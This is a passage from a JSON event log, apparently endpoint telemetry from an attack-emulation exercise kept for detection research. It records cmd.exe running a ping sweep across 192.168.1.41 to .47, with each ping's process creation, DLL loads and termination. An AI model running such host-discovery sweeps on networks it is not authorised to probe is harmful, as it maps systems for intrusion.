"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182140000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "event_type": "process", - "pid": 5276, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572182450016, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.41", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8060, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572182680000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182610000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182770000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572182770000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "event_type": "process", - "pid": 8060, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572186840000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-001003D85101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.42", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572186990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "event_type": "process", - "pid": 7204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572191990000, - "unique_pid": "{42FC7E13-CB62-5C05-0000-00107DDA5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.43", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2448, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572192130000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572192140000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "event_type": "process", - "pid": 2448, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572196830000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-0010EBDC5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.44", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4244, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572196980000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572196990000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "event_type": "process", - "pid": 4244, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572197450016, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001069DF5101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.45", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4996, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572197670000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197610000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572197770000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "event_type": "process", - "pid": 4996, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572201830000, - "unique_pid": "{42FC7E13-CB63-5C05-0000-001064E25101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.46", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7180, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572201980000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572201990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "event_type": "process", - "pid": 7180, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572206990000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-0010D2E45101}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.47", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7264, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572207140000, - "unique_pid": "{42FC7E13-CB64-5C05-0000-00104DE75101}", - "unique_ppid": 